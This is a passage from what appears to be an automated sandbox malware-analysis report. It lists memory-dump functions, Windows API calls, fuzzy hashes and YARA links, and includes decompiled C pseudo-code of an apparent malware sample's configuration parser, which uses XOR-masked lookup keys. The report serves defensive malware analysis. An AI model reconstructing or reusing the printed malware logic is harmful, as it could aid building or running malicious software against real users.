                                                                                                                                  0x031a1ea3
                                                                                                                                  0x031a1ea5
                                                                                                                                  0x031a1ea5
                                                                                                                                  0x031a1eaa
                                                                                                                                  0x031a1eaa
                                                                                                                                  0x031a1e92
                                                                                                                                  0x031a1ebe

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A144D: SysFreeString.OLEAUT32(?), ref: 031A152C
                                                                                                                                    • Part of subcall function 031A25D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,031A474F,004F0053,00000000,?), ref: 031A25DF
                                                                                                                                    • Part of subcall function 031A25D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,031A474F,004F0053,00000000,?), ref: 031A2609
                                                                                                                                    • Part of subcall function 031A25D6: memset.NTDLL ref: 031A261D
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1EAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 397948122-0
                                                                                                                                  • Opcode ID: 5d85312217f9a36cf57d1459b8f155460aa1b069339e06aee3f1ab8b205abde6
                                                                                                                                  • Instruction ID: 030375cf77b59c356475a66364be1d78b43ebac6912a97ace846bd8c696ec128
                                                                                                                                  • Opcode Fuzzy Hash: 5d85312217f9a36cf57d1459b8f155460aa1b069339e06aee3f1ab8b205abde6
                                                                                                                                  • Instruction Fuzzy Hash: 5701717A904919BFDB12DFA8DC00DABBBB9FF0C251F018535E901E7160D770A962C7A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6E97A0D4,00000000), ref: 6E9314AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction ID: 33ade8be65f4f0e96915dc9de31944de636d38c0d5e1cf206d72fab4f015bedb
                                                                                                                                  • Opcode Fuzzy Hash: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction Fuzzy Hash: 2CF0E03160493557EB515AF7881CF9B37AD9F83770B31C5219C54D63A4DB30D8058DE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F5C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlEncodePointer.NTDLL(?), ref: 6E8F5C69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                  • Opcode ID: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction ID: ea0b29dbe5e6a269ff91347ced616a4077e37ffaf3acb5e122e88cc3d2e5b3f4
                                                                                                                                  • Opcode Fuzzy Hash: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction Fuzzy Hash: 21D0C9B000CF14DFDF05AF54E8147A43BB8FF07306F000428E40D93698D7B59468CA48
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031AAB16, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031AAB16() {

				E031AABF6(0x31ac344, 0x31ad124); // executed
				goto __eax;
			}



                                                                                                                                  0x031aab28
                                                                                                                                  0x031aab2f

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 031AAB28
                                                                                                                                    • Part of subcall function 031AABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 031AAC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: bdca68246cef6413b20526dbc7c5b0bf7e5c6e15bd6d12b15eaf1d457b3e28a7
                                                                                                                                  • Instruction ID: 8dc2744ee8a2723f9208da5b03bcf51148234bebe15f7163415b2dad1cd6b918
                                                                                                                                  • Opcode Fuzzy Hash: bdca68246cef6413b20526dbc7c5b0bf7e5c6e15bd6d12b15eaf1d457b3e28a7
                                                                                                                                  • Instruction Fuzzy Hash: 4DB092AD268D01BF6008D10C2A22C3E418DC88CA13320802AB801D8001EB629C854031
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031AAB31, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031AAB31() {

				E031AABF6(0x31ac344, 0x31ad134); // executed
				goto __eax;
			}



                                                                                                                                  0x031aab28
                                                                                                                                  0x031aab2f

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 031AAB28
                                                                                                                                    • Part of subcall function 031AABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 031AAC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 7ac22d48c66a687d579f142fad4b9f3c579b7433f7138ac72300c841cb16f62b
                                                                                                                                  • Instruction ID: e1e2444d398734f7489b55ad01a3fead99e50471de6df738387feba88c75e0b1
                                                                                                                                  • Opcode Fuzzy Hash: 7ac22d48c66a687d579f142fad4b9f3c579b7433f7138ac72300c841cb16f62b
                                                                                                                                  • Instruction Fuzzy Hash: BBB0928D26AD01AF6088D10C2A22C3A418EC88CA13320801AA801C8101EF514C854131
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A75F6, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A75F6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x31ad270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                  0x031a7602
                                                                                                                                  0x031a7608

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 050252c661a5afe405dcf0856c033f335e7f6ba7b10784b0bae4a982a194c370
                                                                                                                                  • Instruction ID: acdcc113f957ab57f01df3d4bdeb2ca3bd6c380d60c85994df39b72b5c6eb168
                                                                                                                                  • Opcode Fuzzy Hash: 050252c661a5afe405dcf0856c033f335e7f6ba7b10784b0bae4a982a194c370
                                                                                                                                  • Instruction Fuzzy Hash: 40B01275000900ABCE156B10EF08F067B71B75C702F024012B20480468C33144A4FB24
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 031A4C40, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E031A4C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x31ad2dc; // 0x69b25f44
				if(E031A5657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x31ad310 = _v8;
				}
				_t33 =  *0x31ad2dc; // 0x69b25f44
				if(E031A5657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x31ad2dc; // 0x69b25f44
				if(E031A5657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x31ad270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x31ad2dc; // 0x69b25f44
						_t45 = E031A3BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x31ad278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x31ad2dc; // 0x69b25f44
						_t46 = E031A3BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x31ad27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x31ad2dc; // 0x69b25f44
						_t47 = E031A3BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x31ad280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x31ad2dc; // 0x69b25f44
						_t48 = E031A3BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x31ad004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x31ad2dc; // 0x69b25f44
						_t49 = E031A3BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x31ad02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x31ad2dc; // 0x69b25f44
						_t50 = E031A3BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x31ad284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x31ad2dc; // 0x69b25f44
								_t51 = E031A3BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E031A49B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E031A4B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x31ad2dc; // 0x69b25f44
								_t52 = E031A3BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E031A49B8(0, _t52) != 0) {
								_t121 =  *0x31ad364; // 0x5bd95b0
								E031A9311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x31ad2dc; // 0x69b25f44
								_t53 = E031A3BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x31ad2e0; // 0x2a2a5a8
								_t22 = _t54 + 0x31ae252; // 0x616d692f
								 *0x31ad30c = _t22;
								goto L60;
							} else {
								_t64 = E031A49B8(0, _t53);
								 *0x31ad30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x31ad2dc; // 0x69b25f44
										_t56 = E031A3BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x31ad2e0; // 0x2a2a5a8
										_t23 = _t57 + 0x31ae79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E031A49B8(0, _t56);
									}
									 *0x31ad380 = _t58;
									HeapFree( *0x31ad270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                                                  0x031a4c40
                                                                                                                                  0x031a4c43
                                                                                                                                  0x031a4c63
                                                                                                                                  0x031a4c71
                                                                                                                                  0x031a4c71
                                                                                                                                  0x031a4c76
                                                                                                                                  0x031a4c90
                                                                                                                                  0x031a4ef8
                                                                                                                                  0x031a4eff
                                                                                                                                  0x031a4f06
                                                                                                                                  0x031a4f06
                                                                                                                                  0x031a4c96
                                                                                                                                  0x031a4cb2
                                                                                                                                  0x031a4ee6
                                                                                                                                  0x031a4ef0
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4cb8
                                                                                                                                  0x031a4cb8
                                                                                                                                  0x031a4cbd
                                                                                                                                  0x031a4cd3
                                                                                                                                  0x031a4cbf
                                                                                                                                  0x031a4cbf
                                                                                                                                  0x031a4ccc
                                                                                                                                  0x031a4ccc
                                                                                                                                  0x031a4cdd
                                                                                                                                  0x031a4cdf
                                                                                                                                  0x031a4ce9
                                                                                                                                  0x031a4cee
                                                                                                                                  0x031a4cee
                                                                                                                                  0x031a4ce9
                                                                                                                                  0x031a4cf5
                                                                                                                                  0x031a4d0b
                                                                                                                                  0x031a4cf7
                                                                                                                                  0x031a4cf7
                                                                                                                                  0x031a4d04
                                                                                                                                  0x031a4d04
                                                                                                                                  0x031a4d0f
                                                                                                                                  0x031a4d11
                                                                                                                                  0x031a4d1b
                                                                                                                                  0x031a4d20
                                                                                                                                  0x031a4d20
                                                                                                                                  0x031a4d1b
                                                                                                                                  0x031a4d27
                                                                                                                                  0x031a4d3d
                                                                                                                                  0x031a4d29
                                                                                                                                  0x031a4d29
                                                                                                                                  0x031a4d36
                                                                                                                                  0x031a4d36
                                                                                                                                  0x031a4d41
                                                                                                                                  0x031a4d43
                                                                                                                                  0x031a4d4d
                                                                                                                                  0x031a4d52
                                                                                                                                  0x031a4d52
                                                                                                                                  0x031a4d4d
                                                                                                                                  0x031a4d59
                                                                                                                                  0x031a4d6f
                                                                                                                                  0x031a4d5b
                                                                                                                                  0x031a4d5b
                                                                                                                                  0x031a4d68
                                                                                                                                  0x031a4d68
                                                                                                                                  0x031a4d73
                                                                                                                                  0x031a4d75
                                                                                                                                  0x031a4d7f
                                                                                                                                  0x031a4d84
                                                                                                                                  0x031a4d84
                                                                                                                                  0x031a4d7f
                                                                                                                                  0x031a4d8b
                                                                                                                                  0x031a4da1
                                                                                                                                  0x031a4d8d
                                                                                                                                  0x031a4d8d
                                                                                                                                  0x031a4d9a
                                                                                                                                  0x031a4d9a
                                                                                                                                  0x031a4da5
                                                                                                                                  0x031a4da7
                                                                                                                                  0x031a4db1
                                                                                                                                  0x031a4db6
                                                                                                                                  0x031a4db6
                                                                                                                                  0x031a4db1
                                                                                                                                  0x031a4dbd
                                                                                                                                  0x031a4dd3
                                                                                                                                  0x031a4dbf
                                                                                                                                  0x031a4dbf
                                                                                                                                  0x031a4dcc
                                                                                                                                  0x031a4dcc
                                                                                                                                  0x031a4dd7
                                                                                                                                  0x031a4dea
                                                                                                                                  0x031a4dea
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4dd9
                                                                                                                                  0x031a4dd9
                                                                                                                                  0x031a4de3
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4df4
                                                                                                                                  0x031a4df4
                                                                                                                                  0x031a4df6
                                                                                                                                  0x031a4e0c
                                                                                                                                  0x031a4df8
                                                                                                                                  0x031a4df8
                                                                                                                                  0x031a4e05
                                                                                                                                  0x031a4e05
                                                                                                                                  0x031a4e10
                                                                                                                                  0x031a4e12
                                                                                                                                  0x031a4e15
                                                                                                                                  0x031a4e16
                                                                                                                                  0x031a4e1d
                                                                                                                                  0x031a4e1f
                                                                                                                                  0x031a4e20
                                                                                                                                  0x031a4e20
                                                                                                                                  0x031a4e1d
                                                                                                                                  0x031a4e27
                                                                                                                                  0x031a4e3d
                                                                                                                                  0x031a4e29
                                                                                                                                  0x031a4e29
                                                                                                                                  0x031a4e36
                                                                                                                                  0x031a4e36
                                                                                                                                  0x031a4e41
                                                                                                                                  0x031a4e4f
                                                                                                                                  0x031a4e59
                                                                                                                                  0x031a4e59
                                                                                                                                  0x031a4e60
                                                                                                                                  0x031a4e76
                                                                                                                                  0x031a4e62
                                                                                                                                  0x031a4e62
                                                                                                                                  0x031a4e6f
                                                                                                                                  0x031a4e6f
                                                                                                                                  0x031a4e7a
                                                                                                                                  0x031a4e8d
                                                                                                                                  0x031a4e8d
                                                                                                                                  0x031a4e92
                                                                                                                                  0x031a4e98
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4e7c
                                                                                                                                  0x031a4e7f
                                                                                                                                  0x031a4e84
                                                                                                                                  0x031a4e8b
                                                                                                                                  0x031a4e9d
                                                                                                                                  0x031a4e9f
                                                                                                                                  0x031a4eb5
                                                                                                                                  0x031a4ea1
                                                                                                                                  0x031a4ea1
                                                                                                                                  0x031a4eae
                                                                                                                                  0x031a4eae
                                                                                                                                  0x031a4eb9
                                                                                                                                  0x031a4ec5
                                                                                                                                  0x031a4eca
                                                                                                                                  0x031a4eca
                                                                                                                                  0x031a4ebb
                                                                                                                                  0x031a4ebe
                                                                                                                                  0x031a4ebe
                                                                                                                                  0x031a4ed8
                                                                                                                                  0x031a4edd
                                                                                                                                  0x031a4ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4e8b
                                                                                                                                  0x031a4e7a
                                                                                                                                  0x031a4de3
                                                                                                                                  0x031a4dd7

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4CE5
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4D17
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4D49
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4D7B
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4DAD
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4DDF
                                                                                                                                  • HeapFree.KERNEL32(00000000,031A5390,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008,?,031A5390), ref: 031A4EDD
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008,?,031A5390), ref: 031A4EF0
                                                                                                                                    • Part of subcall function 031A49B8: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,031A5390,031A4EC3,00000000,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005), ref: 031A49C1
                                                                                                                                    • Part of subcall function 031A49B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,031A5390), ref: 031A49E4
                                                                                                                                    • Part of subcall function 031A49B8: memset.NTDLL ref: 031A49F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3442150357-8415677
                                                                                                                                  • Opcode ID: a23a656c855cc493df98729c225e701fedb516e418ab8a46dddedd513fbbb351
                                                                                                                                  • Instruction ID: 86d42f35a6f99382863d7dfe7400110ebe18da827e3abe704f52de24b3256c14
                                                                                                                                  • Opcode Fuzzy Hash: a23a656c855cc493df98729c225e701fedb516e418ab8a46dddedd513fbbb351
                                                                                                                                  • Instruction Fuzzy Hash: 6981A77CA00E04AFC724EB7D9D84D5BB7E9AB9C2037294956A001D7308EFB5D585CB70
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E84C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E8E5
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E90E
                                                                                                                                  • GetACP.KERNEL32(?,?,6E93EB6A,?,00000000), ref: 6E93E923
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                  • Opcode ID: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction ID: 4318d4e15fb3c2a6cba4e2a94113be2d0a92a1864bfaa58d4dacbab557bf9533
                                                                                                                                  • Opcode Fuzzy Hash: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction Fuzzy Hash: 5921D822E54325EAD7A48BD9C901BCB77BFEF45B54B624824E905D7508F732DD40CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E163
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E18E
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E222
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E230
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E93E2F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4147378913-0
                                                                                                                                  • Opcode ID: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction ID: c6d8739dd68596a371a97e8dcb328ee0b019f3e5ea5c901a74b8c575f3f97c1a
                                                                                                                                  • Opcode Fuzzy Hash: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction Fuzzy Hash: 58710571604326AAEB659BF5CC55BAB73ACEF95304F30082AE919D7280EB70ED40CF51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F2FB
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F331
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E93EB2D
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 6E93EB76
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 6E93EB85
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E93EBCD
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E93EBEC
                                                                                                                                  Memory Dump Source
